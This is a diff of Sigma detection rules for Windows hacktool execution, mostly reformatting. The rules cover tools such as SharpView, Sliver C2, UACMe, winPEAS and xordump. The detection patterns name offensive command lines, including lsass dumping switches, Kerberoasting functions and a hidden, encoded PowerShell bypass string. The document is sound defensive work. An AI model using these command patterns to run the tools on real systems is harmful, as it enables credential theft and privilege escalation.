SharpImpersonation.exe + - NewProcessName|endswith: \SharpImpersonation.exe + - OriginalFileName: SharpImpersonation.exe selection_cli: - - CommandLine|contains|all: - - ' user:' - - ' binary:' - - CommandLine|contains|all: - - ' user:' - - ' shellcode:' - - CommandLine|contains: - - ' technique:CreateProcessAsUserW' - - ' technique:ImpersonateLoggedOnuser' + - CommandLine|contains|all: + - ' user:' + - ' binary:' + - CommandLine|contains|all: + - ' user:' + - ' shellcode:' + - CommandLine|contains: + - ' technique:CreateProcessAsUserW' + - ' technique:ImpersonateLoggedOnuser' condition: process_creation and (1 of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_sharp_ldap_monitor.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_sharp_ldap_monitor.yml index e3a3a52ca..a62cfe4d4 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_sharp_ldap_monitor.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_sharp_ldap_monitor.yml @@ -1,8 +1,7 @@ title: HackTool - SharpLDAPmonitor Execution id: 9f8fc146-1d1a-4dbf-b8fd-dfae15e08541 status: test -description: Detects execution of the SharpLDAPmonitor. Which can monitor the creation, - deletion and changes to LDAP objects. +description: Detects execution of the SharpLDAPmonitor. Which can monitor the creation, deletion and changes to LDAP objects. references: - https://github.com/p0dalirius/LDAPmonitor author: Nasreddine Bencherchali (Nextron Systems) @@ -18,10 +17,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \SharpLDAPmonitor.exe - - OriginalFileName: SharpLDAPmonitor.exe + - NewProcessName|endswith: \SharpLDAPmonitor.exe + - OriginalFileName: SharpLDAPmonitor.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - '/user:' - '/pass:' - '/dcip:' diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_sharpersist.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_sharpersist.yml index c0ab1f1a0..874534778 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_sharpersist.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_sharpersist.yml @@ -1,8 +1,7 @@ title: HackTool - SharPersist Execution id: 26488ad0-f9fd-4536-876f-52fea846a2e4 status: test -description: Detects the execution of the hacktool SharPersist - used to deploy various - different kinds of persistence mechanisms +description: Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms references: - https://www.mandiant.com/resources/blog/sharpersist-windows-persistence-toolkit - https://github.com/mandiant/SharPersist @@ -20,22 +19,22 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \SharPersist.exe - - Product: SharPersist + - NewProcessName|endswith: \SharPersist.exe + - Product: SharPersist selection_cli_1: - CommandLine|contains: + CommandLine|contains: - ' -t schtask -c ' - ' -t startupfolder -c ' selection_cli_2: - CommandLine|contains|all: + CommandLine|contains|all: - ' -t reg -c ' - ' -m add' selection_cli_3: - CommandLine|contains|all: + CommandLine|contains|all: - ' -t service -c ' - ' -m add' selection_cli_4: - CommandLine|contains|all: + CommandLine|contains|all: - ' -t schtask -c ' - ' -m add' condition: process_creation and (1 of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_sharpevtmute.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_sharpevtmute.yml index 89562b1b9..f8c2d14a4 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_sharpevtmute.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_sharpevtmute.yml @@ -1,11 +1,10 @@ title: HackTool - SharpEvtMute Execution id: bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c related: - - id: 49329257-089d-46e6-af37-4afce4290685 - type: similar + - id: 49329257-089d-46e6-af37-4afce4290685 # DLL load + type: similar status: test -description: Detects the use of SharpEvtHook, a tool that tampers with the Windows - event logs +description: Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs references: - https://github.com/bats3c/EvtMute author: Florian Roth (Nextron Systems) @@ -22,11 +21,11 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \SharpEvtMute.exe - - Description: SharpEvtMute - - CommandLine|contains: - - '--Filter "rule ' - - --Encoded --Filter \" + - NewProcessName|endswith: \SharpEvtMute.exe + - Description: SharpEvtMute + - CommandLine|contains: + - '--Filter "rule ' + - --Encoded --Filter \" condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_sharpldapwhoami.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_sharpldapwhoami.yml index 0b9e21c98..c13ae986b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_sharpldapwhoami.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_sharpldapwhoami.yml @@ -1,8 +1,7 @@ title: HackTool - SharpLdapWhoami Execution id: d9367cbb-c2e0-47ce-bdc0-128cb6da898d status: test -description: Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service - on a domain controller +description: Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller references: - https://github.com/bugch3ck/SharpLdapWhoami author: Florian Roth (Nextron Systems) @@ -20,12 +19,12 @@ detection: EventID: 4688 Channel: Security selection_name: - NewProcessName|endswith: \SharpLdapWhoami.exe - selection_pe: - - OriginalFileName|contains: SharpLdapWhoami - - Product: SharpLdapWhoami + NewProcessName|endswith: \SharpLdapWhoami.exe + selection_pe: # in case the file has been renamed after compilation + - OriginalFileName|contains: SharpLdapWhoami + - Product: SharpLdapWhoami selection_flags1: - CommandLine|endswith: + CommandLine|endswith: - ' /method:ntlm' - ' /method:kerb' - ' /method:nego' diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_sharpup.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_sharpup.yml index 84804b55a..c5ef25e84 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_sharpup.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_sharpup.yml @@ -20,16 +20,16 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \SharpUp.exe - - Description: SharpUp - - CommandLine|contains: - - HijackablePaths - - UnquotedServicePath - - ProcessDLLHijack - - ModifiableServiceBinaries - - ModifiableScheduledTask - - DomainGPPPassword - - CachedGPPPassword + - NewProcessName|endswith: \SharpUp.exe + - Description: SharpUp + - CommandLine|contains: + - HijackablePaths + - UnquotedServicePath + - ProcessDLLHijack + - ModifiableServiceBinaries + - ModifiableScheduledTask + - DomainGPPPassword + - CachedGPPPassword condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_sharpview.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_sharpview.yml index be01b9e6e..abe711417 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_sharpview.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_sharpview.yml @@ -1,11 +1,10 @@ title: HackTool - SharpView Execution id: b2317cfa-4a47-4ead-b3ff-297438c0bc2d related: - - id: dcd74b95-3f36-4ed9-9598-0490951643aa - type: similar + - id: dcd74b95-3f36-4ed9-9598-0490951643aa + type: similar status: test -description: Adversaries may look for details about the network configuration and - settings of systems they access or through information discovery of remote systems +description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems references: - https://github.com/tevora-threat/SharpView/ - https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 @@ -28,91 +27,117 @@ detection: EventID: 4688 Channel: Security selection: - - OriginalFileName: SharpView.exe - - NewProcessName|endswith: \SharpView.exe - - CommandLine|contains: - - Add-RemoteConnection - - Convert-ADName - - ConvertFrom-SID - - ConvertFrom-UACValue - - Convert-SidToName - - Export-PowerViewCSV - - Find-DomainObjectPropertyOutlier - - Find-DomainProcess - - Find-DomainShare - - Find-DomainUserEvent - - Find-DomainUserLocation - - Find-ForeignGroup - - Find-ForeignUser - - Find-GPOComputerAdmin - - Find-GPOLocation - - Find-Interesting - - Find-LocalAdminAccess - - Find-ManagedSecurityGroups - - Get-CachedRDPConnection - - Get-DFSshare - - Get-DomainComputer - - Get-DomainController - - Get-DomainDFSShare - - Get-DomainDNSRecord - - Get-DomainFileServer - - Get-DomainForeign - - Get-DomainGPO - - Get-DomainGroup - - Get-DomainGUIDMap - - Get-DomainManagedSecurityGroup - - Get-DomainObject - - Get-DomainOU - - Get-DomainPolicy - - Get-DomainSID - - Get-DomainSite - - Get-DomainSPNTicket - - Get-DomainSubnet - - Get-DomainTrust - - Get-DomainUserEvent - - Get-ForestDomain - - Get-ForestGlobalCatalog - - Get-ForestTrust - - Get-GptTmpl - - Get-GroupsXML - - Get-LastLoggedOn - - Get-LoggedOnLocal - - Get-NetComputer - - Get-NetDomain - - Get-NetFileServer - - Get-NetForest - - Get-NetGPO - - Get-NetGroupMember - - Get-NetLocalGroup - - Get-NetLoggedon - - Get-NetOU - - Get-NetProcess - - Get-NetRDPSession - - Get-NetSession - - Get-NetShare - - Get-NetSite - - Get-NetSubnet - - Get-NetUser - - Get-PathAcl - - Get-PrincipalContext - - Get-RegistryMountedDrive - - Get-RegLoggedOn - - Get-WMIRegCachedRDPConnection - - Get-WMIRegLastLoggedOn - - Get-WMIRegMountedDrive - - Get-WMIRegProxy - - Invoke-ACLScanner - - Invoke-CheckLocalAdminAccess - - Invoke-Kerberoast - - Invoke-MapDomainTrust - - Invoke-RevertToSelf - - Invoke-Sharefinder - - Invoke-UserImpersonation - - Remove-DomainObjectAcl - - Remove-RemoteConnection - - Request-SPNTicket - - Set-DomainObject - - Test-AdminAccess + - OriginalFileName: SharpView.exe + - NewProcessName|endswith: \SharpView.exe + - CommandLine|contains: + # - 'Add-DomainGroupMember' + # - 'Add-DomainObjectAcl' + # - 'Add-ObjectAcl' + - Add-RemoteConnection + - Convert-ADName + - ConvertFrom-SID + - ConvertFrom-UACValue + - Convert-SidToName + # - 'ConvertTo-SID' + - Export-PowerViewCSV + # - 'Find-DomainLocalGroupMember' + - Find-DomainObjectPropertyOutlier + - Find-DomainProcess + - Find-DomainShare + - Find-DomainUserEvent + - Find-DomainUserLocation + - Find-ForeignGroup + - Find-ForeignUser + - Find-GPOComputerAdmin + - Find-GPOLocation + - Find-Interesting # 'Find-InterestingDomainAcl', 'Find-InterestingDomainShareFile', 'Find-InterestingFile' + - Find-LocalAdminAccess + - Find-ManagedSecurityGroups + # - 'Get-ADObject' + - Get-CachedRDPConnection + - Get-DFSshare + # - 'Get-DNSRecord' + # - 'Get-DNSZone' + # - 'Get-Domain' + - Get-DomainComputer + - Get-DomainController + - Get-DomainDFSShare + - Get-DomainDNSRecord + # - 'Get-DomainDNSZone' + - Get-DomainFileServer + - Get-DomainForeign # 'Get-DomainForeignGroupMember', 'Get-DomainForeignUser' + - Get-DomainGPO # 'Get-DomainGPOComputerLocalGroupMapping', 'Get-DomainGPOLocalGroup', 'Get-DomainGPOUserLocalGroupMapping' + - Get-DomainGroup # 'Get-DomainGroupMember' + - Get-DomainGUIDMap + - Get-DomainManagedSecurityGroup + - Get-DomainObject # 'Get-DomainObjectAcl' + - Get-DomainOU + - Get-DomainPolicy # 'Get-DomainPolicyData' + - Get-DomainSID + - Get-DomainSite + - Get-DomainSPNTicket + - Get-DomainSubnet + - Get-DomainTrust # 'Get-DomainTrustMapping' + # - 'Get-DomainUser' + - Get-DomainUserEvent + # - 'Get-Forest' + - Get-ForestDomain + - Get-ForestGlobalCatalog + - Get-ForestTrust + - Get-GptTmpl + - Get-GroupsXML + # - 'Get-GUIDMap' + # - 'Get-IniContent' + # - 'Get-IPAddress' + - Get-LastLoggedOn + - Get-LoggedOnLocal + - Get-NetComputer # 'Get-NetComputerSiteName' + - Get-NetDomain # 'Get-NetDomainController', 'Get-NetDomainTrust' + - Get-NetFileServer + - Get-NetForest # 'Get-NetForestCatalog', 'Get-NetForestDomain', 'Get-NetForestTrust' + - Get-NetGPO # 'Get-NetGPOGroup' + # - 'Get-NetGroup' + - Get-NetGroupMember + - Get-NetLocalGroup # 'Get-NetLocalGroupMember' + - Get-NetLoggedon + - Get-NetOU + - Get-NetProcess + - Get-NetRDPSession + - Get-NetSession + - Get-NetShare + - Get-NetSite + - Get-NetSubnet + - Get-NetUser + # - 'Get-ObjectAcl' + - Get-PathAcl + - Get-PrincipalContext + # - 'Get-Proxy' + - Get-RegistryMountedDrive + - Get-RegLoggedOn + # - 'Get-SiteName' + # - 'Get-UserEvent' + # - 'Get-WMIProcess' + - Get-WMIRegCachedRDPConnection + - Get-WMIRegLastLoggedOn + - Get-WMIRegMountedDrive + - Get-WMIRegProxy + - Invoke-ACLScanner + - Invoke-CheckLocalAdminAccess + - Invoke-Kerberoast + - Invoke-MapDomainTrust + - Invoke-RevertToSelf + - Invoke-Sharefinder + - Invoke-UserImpersonation + # - 'New-DomainGroup' + # - 'New-DomainUser' + - Remove-DomainObjectAcl + - Remove-RemoteConnection + - Request-SPNTicket + # - 'Resolve-IPAddress' + # - 'Set-ADObject' + - Set-DomainObject + # - 'Set-DomainUserPassword' + - Test-AdminAccess condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_sliver_c2_execution_pattern.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_sliver_c2_execution_pattern.yml index dcc81a426..b020be03c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_sliver_c2_execution_pattern.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_sliver_c2_execution_pattern.yml @@ -1,8 +1,7 @@ title: HackTool - Sliver C2 Implant Activity Pattern id: 42333b2c-b425-441c-b70e-99404a17170f status: test -description: Detects process activity patterns as seen being used by Sliver C2 framework - implants +description: Detects process activity patterns as seen being used by Sliver C2 framework implants references: - https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/implant/sliver/shell/shell_windows.go#L36 - https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/ @@ -20,7 +19,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: -NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8 + CommandLine|contains: -NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8 condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_stracciatella_execution.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_stracciatella_execution.yml index 64e949335..94051164e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_stracciatella_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_stracciatella_execution.yml @@ -1,9 +1,7 @@ title: HackTool - Stracciatella Execution id: 7a4d9232-92fc-404d-8ce1-4c92e7caf539 status: experimental -description: Detects Stracciatella which executes a Powershell runspace from within - C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled - based on PE metadata characteristics. +description: Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics. references: - https://github.com/mgeeky/Stracciatella author: pH-T (Nextron Systems) @@ -21,17 +19,18 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \Stracciatella.exe - - OriginalFileName: Stracciatella.exe - - Description: Stracciatella - - Hashes|contains: - - SHA256=9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956 - - SHA256=fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a - - sha256: - - 9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956 - - fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a + - NewProcessName|endswith: \Stracciatella.exe + - OriginalFileName: Stracciatella.exe + - Description: Stracciatella + - Hashes|contains: + - SHA256=9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956 + - SHA256=fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a + - sha256: + - 9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956 + - fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a condition: process_creation and selection falsepositives: - Unlikely level: high + ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_sysmoneop.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_sysmoneop.yml index 7dbf43257..cbddd2d16 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_sysmoneop.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_sysmoneop.yml @@ -19,14 +19,14 @@ detection: EventID: 4688 Channel: Security selection_img: - NewProcessName|endswith: \SysmonEOP.exe + NewProcessName|endswith: \SysmonEOP.exe selection_hash: - - Hashes: - - IMPHASH=22F4089EB8ABA31E1BB162C6D9BF72E5 - - IMPHASH=5123FA4C4384D431CD0D893EEB49BBEC - - Imphash: - - 22f4089eb8aba31e1bb162c6d9bf72e5 - - 5123fa4c4384d431cd0d893eeb49bbec + - Hashes: + - IMPHASH=22F4089EB8ABA31E1BB162C6D9BF72E5 + - IMPHASH=5123FA4C4384D431CD0D893EEB49BBEC + - Imphash: + - 22f4089eb8aba31e1bb162c6d9bf72e5 + - 5123fa4c4384d431cd0d893eeb49bbec condition: process_creation and (1 of selection_*) falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_trufflesnout.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_trufflesnout.yml index 35354d6fe..4dcc11277 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_trufflesnout.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_trufflesnout.yml @@ -1,8 +1,7 @@ title: HackTool - TruffleSnout Execution id: 69ca006d-b9a9-47f5-80ff-ecd4d25d481a status: test -description: Detects the use of TruffleSnout.exe an iterative AD discovery toolkit - for offensive operators, situational awareness and targeted low noise enumeration. +description: Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration. references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md - https://github.com/dsnezhkov/TruffleSnout @@ -21,8 +20,8 @@ detection: EventID: 4688 Channel: Security selection: - - OriginalFileName: TruffleSnout.exe - - NewProcessName|endswith: \TruffleSnout.exe + - OriginalFileName: TruffleSnout.exe + - NewProcessName|endswith: \TruffleSnout.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_uacme.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_uacme.yml index 2fa2874fe..c1b63272e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_uacme.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_uacme.yml @@ -1,8 +1,7 @@ title: HackTool - UACMe Akagi Execution id: d38d2fa4-98e6-4a24-aff1-410b0c9ad177 status: test -description: Detects the execution of UACMe, a tool used for UAC bypasses, via default - PE metadata +description: Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata references: - https://github.com/hfiref0x/UACME author: Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems) @@ -20,21 +19,21 @@ detection: EventID: 4688 Channel: Security selection_pe: - - Product: UACMe - - Company: - - REvol Corp - - APT 92 - - UG North - - Hazardous Environments - - CD Project Rekt - - Description: - - UACMe main module - - Pentesting utility - - OriginalFileName: - - Akagi.exe - - Akagi64.exe + - Product: UACMe + - Company: + - REvol Corp + - APT 92 + - UG North + - Hazardous Environments + - CD Project Rekt + - Description: + - UACMe main module + - Pentesting utility + - OriginalFileName: + - Akagi.exe + - Akagi64.exe selection_img: - NewProcessName|endswith: + NewProcessName|endswith: - \Akagi64.exe - \Akagi.exe selection_hashes_sysmon: diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_wce.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_wce.yml index f432e57e1..a58e48c66 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_wce.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_wce.yml @@ -19,17 +19,17 @@ detection: EventID: 4688 Channel: Security selection_1: - - Imphash: - - a53a02b997935fd8eedcb5f7abab9b9f - - e96a73c7bf33a464c510ede582318bf2 - - Hashes|contains: - - IMPHASH=a53a02b997935fd8eedcb5f7abab9b9f - - IMPHASH=e96a73c7bf33a464c510ede582318bf2 + - Imphash: + - a53a02b997935fd8eedcb5f7abab9b9f + - e96a73c7bf33a464c510ede582318bf2 + - Hashes|contains: # Sysmon field hashes contains all types + - IMPHASH=a53a02b997935fd8eedcb5f7abab9b9f + - IMPHASH=e96a73c7bf33a464c510ede582318bf2 selection_2: - CommandLine|endswith: .exe -S + CommandLine|endswith: .exe -S ParentProcessName|endswith: \services.exe filter: - NewProcessName|endswith: \clussvc.exe + NewProcessName|endswith: \clussvc.exe condition: process_creation and (1 of selection_* and not filter) falsepositives: - Another service that uses a single -s command line switch diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_winpeas.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_winpeas.yml index 89a4d4f4d..99086fac2 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_winpeas.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_winpeas.yml @@ -1,8 +1,7 @@ title: HackTool - winPEAS Execution id: 98b53e78-ebaf-46f8-be06-421aafd176d9 status: experimental -description: WinPEAS is a script that search for possible paths to escalate privileges - on Windows hosts. The checks are explained on book.hacktricks.xyz +description: WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz references: - https://github.com/carlospolop/PEASS-ng - https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation @@ -22,29 +21,29 @@ detection: EventID: 4688 Channel: Security selection_img: - - OriginalFileName: winPEAS.exe - - NewProcessName|endswith: - - \winPEASany_ofs.exe - - \winPEASany.exe - - \winPEASx64_ofs.exe - - \winPEASx64.exe - - \winPEASx86_ofs.exe - - \winPEASx86.exe + - OriginalFileName: winPEAS.exe + - NewProcessName|endswith: + - \winPEASany_ofs.exe + - \winPEASany.exe + - \winPEASx64_ofs.exe + - \winPEASx64.exe + - \winPEASx86_ofs.exe + - \winPEASx86.exe selection_cli_option: - CommandLine|contains: - - ' applicationsinfo' - - ' browserinfo' - - ' eventsinfo' - - ' fileanalysis' - - ' filesinfo' - - ' processinfo' - - ' servicesinfo' - - ' windowscreds' + CommandLine|contains: + - ' applicationsinfo' # Search installed applications information + - ' browserinfo' # Search browser information + - ' eventsinfo' # Display interesting events information + - ' fileanalysis' # Search specific files that can contains credentials and for regexes inside files + - ' filesinfo' # Search generic files that can contains credentials + - ' processinfo' # Search processes information + - ' servicesinfo' # Search services information + - ' windowscreds' # Search windows credentials selection_cli_dl: - CommandLine|contains: https://github.com/carlospolop/PEASS-ng/releases/latest/download/ + CommandLine|contains: https://github.com/carlospolop/PEASS-ng/releases/latest/download/ selection_cli_specific: - - ParentCommandLine|endswith: ' -linpeas' - - CommandLine|endswith: ' -linpeas' + - ParentCommandLine|endswith: ' -linpeas' + - CommandLine|endswith: ' -linpeas' condition: process_creation and (1 of selection_*) falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_winpwn.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_winpwn.yml index a6b13fb2e..9b61901c6 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_winpwn.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_winpwn.yml @@ -1,13 +1,11 @@ title: HackTool - WinPwn Execution id: d557dc06-62e8-4468-a8e8-7984124908ce related: - - id: 851fd622-b675-4d26-b803-14bc7baa517a - type: similar + - id: 851fd622-b675-4d26-b803-14bc7baa517a + type: similar status: experimental -description: 'Detects commandline keywords indicative of potential usge of the tool - WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation. - - ' +description: | + Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation. author: Swachchhanda Shrawan Poudel date: 2023/12/04 references: @@ -38,7 +36,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - Offline_Winpwn - 'WinPwn ' - WinPwn.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_wmiexec_default_powershell.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_wmiexec_default_powershell.yml index 34dad0bde..876b15a58 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_wmiexec_default_powershell.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_wmiexec_default_powershell.yml @@ -1,8 +1,7 @@ title: HackTool - Wmiexec Default Powershell Command id: 022eaba8-f0bf-4dd9-9217-4604b0bb3bb0 status: experimental -description: Detects the execution of PowerShell with a specific flag sequence that - is used by the Wmiexec script +description: Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script references: - https://github.com/fortra/impacket/blob/f4b848fa27654ca95bc0f4c73dbba8b9c2c9f30a/examples/wmiexec.py author: Nasreddine Bencherchali (Nextron Systems) @@ -18,7 +17,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: -NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc + CommandLine|contains: -NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_xordump.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_xordump.yml index 79d078d1b..c3fd1d118 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_xordump.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_xordump.yml @@ -19,12 +19,12 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \xordump.exe - - CommandLine|contains: - - ' -process lsass.exe ' - - ' -m comsvcs ' - - ' -m dbghelp ' - - ' -m dbgcore ' + - NewProcessName|endswith: \xordump.exe + - CommandLine|contains: + - ' -process lsass.exe ' + - ' -m comsvcs ' + - ' -m dbghelp ' + - ' -m dbgcore ' condition: process_creation and selection falsepositives: - Another tool that uses the command line switches of XORdump diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_zipexec.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_zipexec.yml index a3bade22b..ee90982b9 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_zipexec.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_zipexec.yml @@ -1,8 +1,7 @@ title: Suspicious ZipExec Execution id: 90dcf730-1b71-4ae7-9ffc-6fcf62bd0132 status: test -description: ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into - a password-protected zip file. +description: ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file. references: - https://twitter.com/SBousseaden/status/1451237393017839616 - https://github.com/Tylous/ZipExec @@ -22,13 +21,13 @@ detection: EventID: 4688 Channel: Security run: - CommandLine|contains|all: + CommandLine|contains|all: - /generic:Microsoft_Windows_Shell_ZipFolder:filename= - .zip - '/pass:' - '/user:' delete: - CommandLine|contains|all: + CommandLine|contains|all: - /delete - Microsoft_Windows_Shell_ZipFolder:filename= - .zip diff --git a/sigma/builtin/process_creation/proc_creation_win_hostname_execution.yml b/sigma/builtin/process_creation/proc_creation_win_hostname_execution.yml index 56c388979..9acbc3f45 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hostname_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hostname_execution.yml @@ -18,7 +18,7 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: \HOSTNAME.EXE + NewProcessName|endswith: \HOSTNAME.EXE condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_hwp_exploits.yml b/sigma/builtin/process_creation/proc_creation_win_hwp_exploits.yml index ce4cf96c5..44d5ddce4 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hwp_exploits.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hwp_exploits.yml @@ -1,8 +1,7 @@ title: Suspicious HWP Sub Processes id: 023394c4-29d5-46ab-92b8-6a534c6f447b status: test -description: Detects suspicious Hangul Word Processor (Hanword) sub processes that - could indicate an exploitation +description: Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation references: - https://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/ - https://www.hybrid-analysis.com/search?query=context:74940dcc5b38f9f9b1a0fea760d344735d7d91b610e6d5bd34533dd0153402c5&from_sample=5db135000388385a7644131f&block_redirect=1 @@ -28,7 +27,7 @@ detection: Channel: Security selection: ParentProcessName|endswith: \Hwp.exe - NewProcessName|endswith: \gbb.exe + NewProcessName|endswith: \gbb.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_icacls_deny.yml b/sigma/builtin/process_creation/proc_creation_win_icacls_deny.yml index 7ad0e01ef..b3e1e1723 100644 --- a/sigma/builtin/process_creation/proc_creation_win_icacls_deny.yml +++ b/sigma/builtin/process_creation/proc_creation_win_icacls_deny.yml @@ -1,8 +1,7 @@ title: Use Icacls to Hide File to Everyone id: 4ae81040-fc1c-4249-bfa3-938d260214d9 status: test -description: Detect use of icacls to deny access for everyone in Users folder sometimes - used to hide malicious files +description: Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files references: - https://app.any.run/tasks/1df999e6-1cb8-45e3-8b61-499d1b7d5a9b/ author: frack113 @@ -18,10 +17,10 @@ detection: EventID: 4688 